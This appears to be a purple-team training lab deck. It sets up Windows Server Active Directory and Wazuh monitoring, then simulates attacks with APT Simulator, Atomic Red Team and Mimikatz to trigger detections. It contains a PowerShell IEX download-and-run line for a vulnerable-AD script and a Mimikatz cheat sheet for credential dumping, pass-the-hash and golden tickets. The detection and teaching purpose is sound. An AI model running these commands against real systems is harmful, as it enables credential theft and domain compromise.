purpleTeam-AD LAB
purpleTeam-AD LAB
purpleTeam-AD LAB
Win2016
Joas A Santos
https://www.linkedin.com/in/joas-
antonio-dos-santos/
Joas A Santos
https://www.linkedin.com/in/joas-antonio-dos-santos/
Introduction
Purple Team Introduction course laboratory
Joas A Santos
https://www.linkedin.com/in/joas-antonio-dos-santos/
Documentation:
https://documentation.wazuh.com/current/index.html
Joas A Santos
https://www.linkedin.com/in/joas-antonio-dos-santos/
• Description: A set of software packages required for installing
and running the various Wazuh components.
• Components: This typically includes the Wazuh agent, server,
indexer, and dashboard packages, along with dependencies
like database engines and web servers.
Each of these components plays a vital role in the overall functionality of
the Wazuh security platform. They work in tandem to provide a robust,
scalable solution for security monitoring, threat detection, and compliance
management. The specific packages and installation procedures can vary
depending on the operating system and environment.
AD Structure
Joas A Santos
https://www.linkedin.com/in/joas-antonio-dos-santos/
7. Trust Relationships: Establishes secure connections between
domains and/or forests, allowing access to resources among them.
8. Lightweight Directory Access Protocol (LDAP): A protocol for
reading and editing directory services like AD.
9. Certificate Services: Allows AD to manage the issuance and
revocation of digital certificates.
10. DNS Integration: AD uses the Domain Name System (DNS) to locate
domain controllers and other critical resources.
Configuration LAB
https://www.youtube.com/watch?v=8G6ZTu8qANM
https://www.youtube.com/watch?v=lS9Eulfpffg
https://www.youtube.com/watch?v=6MkJtiWUxhQ
AD Configuration
Joas A Santos
https://www.linkedin.com/in/joas-antonio-dos-santos/
In the left section, the information includes:
• Settings for remote management, remote desktop, and network interface card (NIC)
teaming.
• Date of the last installed update and configuration of Windows Update settings.
• Information about the time zone and the product ID, which includes an activation key.
• Details about the processor, the amount of installed memory, and the total disk space.
In the bottom left corner, the information about the operating system version and the
hardware details indicate that it is running in a VirtualBox environment, which is a virtualization
software.
Joas A Santos
https://www.linkedin.com/in/joas-antonio-dos-santos/
The image you uploaded is a screenshot of the "Add Roles and Features Wizard" from the
Windows Server management interface. This particular step in the wizard is where you select
the type of installation you wish to perform.
2. Remote Desktop Services installation: This option installs the necessary role services
for Virtual Desktop Infrastructure (VDI) to create a virtual machine-based or session-
based desktop deployment. VDI is a technology that allows users to access a desktop
environment on a server rather than on a local computer.
On the top right, we can see the "Destination Server" is identified, which is the server where
these roles or features will be installed.
The screenshot shows the "Add Roles and Features Wizard" in Windows Server, highlighting
the installation type selection. You are presented with two options: a role-based or feature-
based installation for configuring server roles, services, and features, or a Remote Desktop
Services installation for setting up a Virtual Desktop Infrastructure for virtual machine-based or
session-based desktops. The destination server for the installation is specified in the top right
corner.
Joas A Santos
https://www.linkedin.com/in/joas-antonio-dos-santos/
1. Select a server from the server pool: This option is for choosing an existing server from
the pool of servers that are already managed by the Server Manager. The servers listed
here are those that are running Windows Server 2012 or newer versions and have
been added to the server manager for management.
2. Select a virtual hard disk: This option is for installing roles and features directly to an
offline virtual hard disk (VHD) file without affecting the running operating system.
Below these options, there's a "Server Pool" section that lists the servers currently managed by
the Server Manager. In this screenshot, one server is listed with its name, IP address, and
operating system version:
• IP Address: 172.20.10.9
Joas A Santos
https://www.linkedin.com/in/joas-antonio-dos-santos/
1. Install Windows Server 2016: Begin by installing Windows Server 2016 on a server
machine. Ensure that the server meets all the hardware requirements for Windows
Server 2016 and has a static IP address.
Joas A Santos
https://www.linkedin.com/in/joas-antonio-dos-santos/
2. Configure Basic Server Settings: Set up the server's basic settings, such as computer
name, IP configuration, and updates.
• Proceed through the wizard until you reach the 'Server Roles' page.
• Add features that are required for Active Directory Domain Services.
• Choose to add a new forest and specify the Root domain name (e.g.,
yourcompany.local).
• Proceed through the wizard, setting a Directory Services Restore Mode (DSRM)
password and other settings as required.
5. Configure DNS and DHCP (if necessary): Active Directory relies heavily on DNS. If your
server is also going to be the DNS server, you should configure DNS settings
appropriately. If you're using DHCP, configure it to assign IP addresses automatically
within your network.
6. Create Users, Groups, and OUs: After the AD DS installation, use the Active Directory
Users and Computers console to create and manage user accounts, groups, and
Organizational Units (OUs).
7. Set Up Group Policies: Utilize the Group Policy Management Console (GPMC) to create
and manage Group Policy Objects (GPOs) that define security settings and other
operational behaviors for users and computers in your domain.
8. Backup and Disaster Recovery Planning: Regularly back up your AD DS to recover from
accidental deletion or corruption of AD data.
Vulnerable-AD
Joas A Santos
https://www.linkedin.com/in/joas-antonio-dos-santos/
# if you didn't install Active Directory yet , you can try
Install-windowsfeature AD-domain-services
Import-Module ADDSDeployment
Install-ADDSForest -CreateDnsDelegation:$false -DatabasePath "C:\\Windows\\NTDS" -
DomainMode "7" -DomainName "cs.org" -DomainNetbiosName "cs" -ForestMode "7" -
InstallDns:$true -LogPath "C:\\Windows\\NTDS" -NoRebootOnCompletion:$false -SysvolPath
"C:\\Windows\\SYSVOL" -Force:$true
# if you already installed Active Directory, just run the script !
IEX((new-object
net.webclient).downloadstring("https://raw.githubusercontent.com/wazehell/vulnerable-
AD/master/vulnad.ps1"));
Invoke-VulnAD -UsersLimit 100 -DomainName "domain.org"
Supported Attacks
• Abusing ACLs/ACEs
• Kerberoasting
• AS-REP Roasting
• Abuse DnsAdmins
• Password Spraying
• DCSync
• Silver Ticket
• Golden Ticket
• Pass-the-Hash
• Pass-the-Ticket
https://github.com/safebuffer/vulnerable-AD
Joas A Santos
https://www.linkedin.com/in/joas-antonio-dos-santos/
Wazuh Configuration
• Security Information Management: Includes tools for security events, which allow
browsing and identifying security alerts, and integrity monitoring, which alerts related
to file changes.
• Threat Detection and Response: Contains tools for identifying vulnerabilities in the
system and for utilizing the MITRE ATT&CK knowledge base, which is a globally-
accessible knowledge base of adversary tactics and techniques.
• Auditing and Policy Monitoring: Features tools for policy monitoring and system
auditing to ensure systems are configured correctly and user behavior is monitored.
Joas A Santos
https://www.linkedin.com/in/joas-antonio-dos-santos/
Powershell Logs
This image likely shows the Group Policy Editor in Windows, which is a tool
for managing system and user settings. It typically displays a tree of
configuration categories like Computer Configuration and User
Configuration, each with a variety of sub-categories for detailed settings.
This image may show the settings within the Group Policy Editor specific to
Windows PowerShell, such as enabling script execution policies, transcript
logging, or module logging.
Joas A Santos
https://www.linkedin.com/in/joas-antonio-dos-santos/
Here you would see the details of the 'Turn on PowerShell Transcription'
setting within the Group Policy Editor. This setting, when enabled, allows
the capture of all input and output from PowerShell sessions to a text-
based transcript file.
This image likely displays the Event Viewer with logs related to PowerShell
activities. It would show details of executed commands, scripts, and
possibly any system changes or errors that occurred during a PowerShell
session.
Joas A Santos
https://www.linkedin.com/in/joas-antonio-dos-santos/
This image probably shows the Registry Editor with the PowerShell module
logging settings. These settings control the logging of PowerShell module
activities and can be adjusted for security and troubleshooting purposes.
Joas A Santos
https://www.linkedin.com/in/joas-antonio-dos-santos/
This would be a view of the Wazuh security management platform's
interface, showing the administrative options, such as setting rules and
monitoring agents.
In this image, you'd see the rules management interface within Wazuh,
displaying a list of security monitoring rules that can be applied to the
agents.
This image might show how Wazuh allows users to manage custom rule
files, including adding new ones or editing existing rules.
Joas A Santos
https://www.linkedin.com/in/joas-antonio-dos-santos/
Here you would find the configuration details of local rules within Wazuh,
which are rules that have been added or modified by the administrator for
specific monitoring needs.
<!-- Local rules -->
<!--
Dec 10 01:02:02 host sshd[1234]: Failed none for root from 1.1.1.1
port 1066 ssh2
-->
<rule id="100001" level="5">
<if_sid>5716</if_sid>
<srcip>1.1.1.1</srcip>
<description>sshd: authentication failed from IP
1.1.1.1.</description>
<group>authentication_failed,pci_dss_10.2.4,pci_dss_10.2.5,</group>
</rule>
</group>
<group name="windows-custom,">
<rule id="100535" level="5">
<if_sid>60009</if_sid>
<field name="win.system.providerName">^Microsoft-Windows-
PowerShell$</field>
<group>powershell,</group>
<description>Powershell Information EventLog</description>
</rule>
Joas A Santos
https://www.linkedin.com/in/joas-antonio-dos-santos/
<description>Powershell Warning EventLog</description>
</rule>
</group>
https://github.com/OpenSecureCo/Wazuh/blob/main/PowerShell%20Lo
gging
Joas A Santos
https://www.linkedin.com/in/joas-antonio-dos-santos/
Joas A Santos
https://www.linkedin.com/in/joas-antonio-dos-santos/
Deploying an agent in Wazuh involves a few key steps. Here’s a general
overview of the process:
1. Download the Wazuh Agent: On the Wazuh server, go to the
section for adding agents and select the appropriate version of the
Wazuh agent for the operating system you want to monitor.
Joas A Santos
https://www.linkedin.com/in/joas-antonio-dos-santos/
2. Install the Agent: On the target system (the one you want to
monitor), run the installer that you downloaded. The installation
process varies depending on the operating system. For example, on
Windows, it’s an executable installer, while on Linux, it’s often a
package you install via the command line.
3. Connect the Agent to the Manager:
• Windows: You’ll need to open the Wazuh agent manager
application and point it to the IP address of your Wazuh
server. You might also need to insert an authentication key.
• Linux: This often involves editing the ossec.conf file to include
the manager's IP address and then running the
manage_agents utility to import the key.
4. Start the Wazuh Agent: After installation and configuration, start
the agent service. On Windows, this can typically be done through
the Services application. On Linux, you can use the systemctl
command.
5. Check the Agent’s Connection on the Server: Back on the Wazuh
server, you can verify that the agent has connected successfully. This
is typically done through the Wazuh dashboard, where you should
now see the agent listed as active.
6. Agent Configuration (Optional): Depending on your needs, you may
configure the agent further to enable specific rules, adjust logging
levels, or set up active responses.
Joas A Santos
https://www.linkedin.com/in/joas-antonio-dos-santos/
Wazuh Service Started
Agent Actived
Sysmon integration
Download Sysmon: https://learn.microsoft.com/pt-br/sysinternals/downloads/sysmon
Sysmonconfig.xml https://wazuh.com/resources/blog/detecting-process-injection-with-
wazuh/sysmonconfig.xml
The image shows a command-line interface with the output from running Sysmon (System
Monitor), a Windows system service and device driver that monitors and logs system activity to
the Windows event log. It is part of the Sysinternals suite of tools provided by Microsoft.
The user has executed Sysmon with the command .sysmon.exe -accepteula -i
sysmonconfig.xml, which performs the following actions:
Joas A Santos
https://www.linkedin.com/in/joas-antonio-dos-santos/
• -accepteula: Automatically accepts the End User License Agreement (EULA). This is
required to run Sysmon without interactive input.
<localfile>
<location>Microsoft-Windows-Sysmon/Operational</location>
<log_format>eventchannel</log_format>
</localfile>
</ossec_config>
Add in End Line
Restart Service
Joas A Santos
https://www.linkedin.com/in/joas-antonio-dos-santos/
Edit file in Wazuh Server:
/var/ossec/etc/rules/local_rules.xml
<!-- This rule detects NTDS.dit file extraction using a sysmon event
captured on the domain controller -->
<rule id="110006" level="12">
<if_group>sysmon_event1</if_group>
<field name="win.eventdata.commandLine"
type="pcre2">NTDSUTIL</field>
<description>Possible NTDS.dit file extraction using
ntdsutil.exe</description>
</rule>
Joas A Santos
https://www.linkedin.com/in/joas-antonio-dos-santos/
<!-- This rule detects Pass-the-ash (PtH) attacks using windows
security event 4624 on the compromised endpoint -->
<rule id="110007" level="12">
<if_sid>60103</if_sid>
<field name="win.system.eventID">^4624$</field>
<field name="win.eventdata.LogonProcessName"
type="pcre2">seclogo</field>
<field name="win.eventdata.LogonType" type="pcre2">9</field>
<field name="win.eventdata.AuthenticationPackageName"
type="pcre2">Negotiate</field>
<field name="win.eventdata.LogonGuid" type="pcre2">{00000000-0000-
0000-0000-000000000000}</field>
<options>no_full_log</options>
<description>Possible Pass the hash attack</description>
</rule>
</group>
ATTACK DEMO
Joas A Santos
https://www.linkedin.com/in/joas-antonio-dos-santos/
Access Securtiy Events
APT Simulator
APT Simulator is a Windows Batch script that uses a set of tools and output files to make a
system look as if it was compromised. In contrast to other adversary simulation tools, APT
Simulator is designed to make the application as simple as possible. You don't need to run a
web server, database or any agents on set of virtual machines. Just download the prepared
archive, extract and run the contained Batch file as Administrator. Running APT Simulator takes
less than a minute of your time.
https://github.com/NextronSystems/APTSimulator/releases
Joas A Santos
https://www.linkedin.com/in/joas-antonio-dos-santos/
Proceed Execution using Y
Joas A Santos
https://www.linkedin.com/in/joas-antonio-dos-santos/
• [2] Command and Control: Simulates techniques used to establish
and maintain communication with a compromised system.
• [3] Credential Access: Simulates attempts to access and extract user
credentials.
• [4] Defense Evasion: Tests methods attackers use to avoid detection.
• [5] Discovery: Simulates techniques used to gain information about
the system.
• [6] Execution: Tests execution of code, which is common in many
attack scenarios.
• [7] Lateral Movement: Simulates the movement through a network
from one system to another.
• [8] Persistence: Tests methods used by attackers to maintain their
foothold in a system.
• [9] Privilege Escalation: Simulates attempts to gain higher-level
permissions.
Additional options include:
• [C] CobaltStrike Beacon Simulation: CobaltStrike is known to be a
threat emulation tool, and this option likely simulates beaconing
techniques used for command and control.
• [A] Apply AV Exclusions in Registry: This could set up the registry to
exclude certain paths or processes from antivirus scanning, useful
for testing without interference from security software.
• [S] Settings: Likely allows the user to configure settings for the tests.
• [E] Exit: To exit the program.
Joas A Santos
https://www.linkedin.com/in/joas-antonio-dos-santos/
Execution Option: 0
Example Alert
The alert is presented in a structured format with various fields providing
detailed information:
• Timestamp: The date and time of the alert are recorded as January
1, 2024, at 13:36:20.145.
• Agent Information: The alert originates from an agent with ID 003
and IP 10.0.0.231, named "Tutorial-Wazuh."
Joas A Santos
https://www.linkedin.com/in/joas-antonio-dos-santos/
• Event Details: The main content of the alert is a log from Windows
PowerShell with a severity level marked as 'Informational'. It shows
that a PowerShell command was executed with an 'exec bypass'
parameter, which is typically used to bypass execution policy
restrictions in PowerShell. The command includes a call to
'powershell.exe' with encoded commands that, when decoded,
seem to point to a web request to 'www.google.com' on port 80.
This could be a legitimate administrative action or a sign of
suspicious activity, depending on the context.
• System Information: The host name is 'ConsoleHost' and it's
running Windows version 5.1.14493.693. The event was logged in
the Microsoft-Windows-PowerShell/Operational channel, with the
event ID 4103.
• Additional Metadata: The log entry includes a unique identifier
(_id), the event record ID, and other metadata related to the system
and event logging
Joas A Santos
https://www.linkedin.com/in/joas-antonio-dos-santos/
The dashboard provides various visual representations of security alerts
and their characteristics:
• Total Alerts: There have been 2 total alerts.
• Level 12 or above alerts: The number of high-severity alerts (Level
12 or above) is indicated as 2, suggesting that two significant
security events have been detected.
• Authentication failure/success: There are no authentication failures
or successes logged, which could mean there have been no recent
authentication-related events, or they haven't met the criteria to
trigger an alert.
The graphs provide different views of the alerts:
• Alert group evolution: A time-series plot that likely shows the
frequency of alerts over time, categorized by the type of alert (e.g.,
windows, powershell, etc.). It seems there has been a spike in alerts
categorized under 'windows_security' at a specific time.
• Top 5 alerts: A donut chart breaking down the most frequent types
of alerts, which provides a quick way to see which alerts are most
common.
• Top 5 rule groups: A pie chart showing the distribution of alerts
across different rule groups. This helps in understanding which rules
are triggering most often.
• Top PCI-DSS Requirements: This donut chart shows the distribution
of alerts related to PCI-DSS (Payment Card Industry Data Security
Joas A Santos
https://www.linkedin.com/in/joas-antonio-dos-santos/
Standard) requirements, which is critical for organizations handling
cardholder data.
At the bottom, there is a table titled "Security Alerts" with columns for
time, techniques, tactics, description, level, and rule ID. This table would
list individual alerts along with these details, but the content is not visible
in the given image.
Overall, this dashboard is a valuable tool for security professionals to
monitor, analyze, and prioritize responses to potential security incidents
within their network. The level 12 alerts suggest that there were
significant events that would likely require immediate investigation.
Joas A Santos
https://www.linkedin.com/in/joas-antonio-dos-santos/
Atomic Red Team
Atomic Red Team is a library of tests that security teams can use to simulate adversarial activity
in their environments. It is an open-source project maintained by Red Canary along with
contributions from the security community.
1. Atomic Tests: The tests, referred to as "atomics," are small, discrete, and modular. They
simulate specific tactics and techniques identified in the MITRE ATT&CK framework,
which is a knowledge base of adversary tactics and techniques based on real-world
observations.
2. Ease of Use: Atomic Red Team is designed to be accessible for security teams with
varying levels of expertise. The tests can be executed with simple commands, making it
easy to integrate into security practices.
5. Integration with Tools: While Atomic Red Team can be used independently, it can also
be integrated with other security tools and platforms to enhance incident response
exercises, security monitoring, and more.
6. Educational Resource: For those new to security testing or the ATT&CK framework,
Atomic Red Team serves as an educational tool, providing examples of how various
techniques are executed.
7. PowerShell Scripts: Many of the tests are implemented as PowerShell scripts, which
makes them suitable for execution on Windows systems. These scripts are often
accompanied by .psd1 files, which are PowerShell Data files containing metadata about
the script modules.
https://github.com/redcanaryco/atomic-red-team
Joas A Santos
https://www.linkedin.com/in/joas-antonio-dos-santos/
Install Invoke-AtomicRedTeam Module
Execute Invoke-AtomicTest
Invoke-AtomicTest T1117
Joas A Santos
https://www.linkedin.com/in/joas-antonio-dos-santos/
Log Result in Wazuh
Mimikatz Example
Joas A Santos
https://www.linkedin.com/in/joas-antonio-dos-santos/
Alert in Wazuh using
Executed mimikatz.exe
#general
privilege::debug
log
log customlogfilename.log
#sekurlsa
sekurlsa::logonpasswords
sekurlsa::logonPasswords full
sekurlsa::tickets /export
sekurlsa::pth /user:Administrator /domain:yourdomain
/ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd
#kerberos
kerberos::list /export
kerberos::ptt c:\chocolate.kirbi
kerberos::golden /admin:administrator /domain:yourdomain /sid:S-1-5-21-130452501-
2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:domain.kirbi
#crypto
crypto::capi
crypto::cng
crypto::certificates /export
crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE
crypto::keys /export
Joas A Santos
https://www.linkedin.com/in/joas-antonio-dos-santos/
crypto::keys /machine /export
#pth
sekurlsa::pth /user:Administrateur /domain:chocolate.local
/ntlm:cc36cf7a8514893efccd332446158b1a
sekurlsa::pth /user:Administrateur /domain:chocolate.local
/aes256:b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9
sekurlsa::pth /user:Administrateur /domain:chocolate.local
/ntlm:cc36cf7a8514893efccd332446158b1a
/aes256:b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9
sekurlsa::pth /user:Administrator /domain:WOSHUB /ntlm:{NTLM_hash} /run:cmd.exe
#ekeys
sekurlsa::ekeys
#dpapi
sekurlsa::dpapi
#minidump
sekurlsa::minidump lsass.dmp
#ptt
kerberos::ptt [email protected]
#golden/silver
kerberos::golden /user:utilisateur /domain:chocolate.local /sid:S-1-5-21-130452501-
2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /id:1107
/groups:513 /ticket:utilisateur.chocolate.kirbi
kerberos::golden /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-
3685010670
/aes256:15540cac73e94028231ef86631bc47bd5c827847ade468d6f6f739eb00c68e42
/user:Administrateur /id:500 /groups:513,512,520,518,519 /ptt /startoffset:-10 /endin:600
/renewmax:10080
kerberos::golden /admin:Administrator /domain:CTU.DOMAIN /sid:S-1-1-12-123456789-
1234567890-123456789 /krbtgt:deadbeefboobbabe003133700009999
/ticket:Administrator.kiribi
#tgt
kerberos::tgt
Joas A Santos
https://www.linkedin.com/in/joas-antonio-dos-santos/
#purge
https://gist.github.com/insi2304/484a4e92941b437bad961fcacda82d49
privilege::debug indicates that Mimikatz has successfully obtained debug privileges on the
system, which are required to access certain types of system information.
Mimikatz is a well-known security utility that can be used to extract plaintext passwords, hash,
PIN codes, and kerberos tickets from memory. It is commonly used in security penetration
testing and is also a popular tool among cyber attackers.
• token::elevate suggests that Mimikatz has elevated a token, which could be used to
gain higher privileges on the system.
• The displayed tokens and credentials include what appears to be a system token for
the NT AUTHORITY\SYSTEM account, which has the highest level of privileges on a
Windows system.
Joas A Santos
https://www.linkedin.com/in/joas-antonio-dos-santos/
• lsadump::sam shows the Security Account Manager (SAM) database being accessed,
which contains hashed passwords for all local accounts on the system.
The presence of NTLM hashes and potentially other credentials indicates that the user of
Mimikatz has been able to extract sensitive security information that could be used to
compromise the system or other systems where these credentials are valid.
Logs of Mimikatz
Joas A Santos
https://www.linkedin.com/in/joas-antonio-dos-santos/
Filter of Mimikatz Logs
Joas A Santos
https://www.linkedin.com/in/joas-antonio-dos-santos/
1. Enable and Configure Log Collection:
• Ensure that Windows Event logs are being forwarded to your Wazuh manager.
This typically involves configuring your agents to collect and forward relevant
security event logs.
2. Create Decoders:
• Develop custom decoders for Wazuh that can parse the incoming logs and
identify log entries that may be indicative of Mimikatz activity, such as those
related to the use of certain Windows APIs or event IDs that are known to be
associated with credential dumping.
3. Write Rules:
• Write rules that trigger alerts when the decoders recognize patterns or
sequences of events that match known Mimikatz signatures. For example, you
might write rules to look for event IDs that correspond to the loading of LSASS
memory, which is a common target for Mimikatz.
• Once tested, deploy the rules to your Wazuh manager. Monitor the alerts
generated by these rules and investigate as necessary.
• Regularly review the effectiveness of your rules and refine them as needed.
Update your rules to adapt to changes in Mimikatz behavior or to incorporate
new threat intelligence.
Here's an example of what a simple Wazuh rule to detect Mimikatz might look like:
Joas A Santos
https://www.linkedin.com/in/joas-antonio-dos-santos/
This rule uses a decoder that would need to be defined to parse logs for entries decoded as
'mimikatz', triggering a high-severity (level 12) alert, and it is tagged with the corresponding
MITRE ATT&CK tactic ID for Credential Access (T1003).
References
https://wazuh.com/blog/how-to-detect-active-directory-attacks-with-wazuh-part-2/
https://www.youtube.com/watch?v=iWOzDs4euG4
https://book.hacktricks.xyz/windows-hardening/stealing-credentials/credentials-mimikatz
https://gist.github.com/insi2304/484a4e92941b437bad961fcacda82d49
https://github.com/OpenSecureCo/Wazuh/blob/main/sysmon.xml
Joas A Santos
https://www.linkedin.com/in/joas-antonio-dos-santos/